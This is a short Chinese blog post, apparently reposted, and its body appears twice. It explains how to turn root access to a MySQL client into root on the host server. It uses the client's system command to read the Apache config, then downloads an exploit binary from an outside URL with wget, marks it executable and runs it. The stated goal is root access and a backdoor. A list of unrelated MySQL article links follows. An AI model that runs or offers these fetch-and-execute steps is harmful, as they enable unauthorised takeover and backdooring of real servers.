mysql以ROOT权限提权方法
2016-06-14 10:01
405 查看
今天feng问了一个问题,mysql root权限运行,直接root服务器吧,SSH登录
正好上网查一下相关的资料:
按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是 按照我的的方法,没有必要再去找web路径了,直接执行
mysql>system vi /etc/httpd/conf/httpd.conf;
直接这样就可以找到web的路径,当然,我们的目的并不是找web路径,放webshell进去。我们是要来做其他的事情,比如,下载exp执行, 搞到 root权限,然后装后门虾米的
mysql>system wget http://www.baidu.org.tw/xxxx ;
mysql>system chmod +x xxxx;
mysql>system ./xxxx;
这样mysql的root此时就成为system的root了,剩下的事情,如果开了ssh,就ssh上去,输入mysql的用户密码,ok,搞定。
相关资料:
http://www.linuxidc.com/Linux/2010-12/30787.htm http://www.waitalone.cn/mysql-tiquan-summary.html?replytocom=390
正好上网查一下相关的资料:
mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内。
按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是 按照我的的方法,没有必要再去找web路径了,直接执行
mysql>system vi /etc/httpd/conf/httpd.conf;
直接这样就可以找到web的路径,当然,我们的目的并不是找web路径,放webshell进去。我们是要来做其他的事情,比如,下载exp执行, 搞到 root权限,然后装后门虾米的
mysql>system wget http://www.baidu.org.tw/xxxx ;
mysql>system chmod +x xxxx;
mysql>system ./xxxx;
这样mysql的root此时就成为system的root了,剩下的事情,如果开了ssh,就ssh上去,输入mysql的用户密码,ok,搞定。
相关资料:
http://www.linuxidc.com/Linux/2010-12/30787.htm http://www.waitalone.cn/mysql-tiquan-summary.html?replytocom=390
相关文章推荐
- mysql中文乱码问题——命令行设置编码格式
- MySQL库中表名忽略大小写设置的影响
- mysql 优化
- Mysql数据库insert into select 单表插入常量
- org.gjt.mm.mysql.Driver和com.mysql.jdbc.Driver有啥区别?
- com.mysql.jdbc.exceptions.jdbc4.CommunicationsException: Communications link failure
- MySql基础操作
- mysql删除索引
- mysql5.7.13版本的编译
- mysql查询替换语句
- mysql基础itcast笔记
- mysql的itcast笔记
- mysql数据库备份导入
- MySQL 事务没有提交导致 锁等待 Lock wait timeout exceeded
- MySQL(DW)
- Mysql海量数据存储和解决方案第二篇 Mysql分表查询海量数据
- Mysql海量数据存储和解决方案第一篇 分布式DB方案
- 那些可能被你忽略的MySQL优化技巧
- mysql 返回多列的方式
- Mysql学习笔记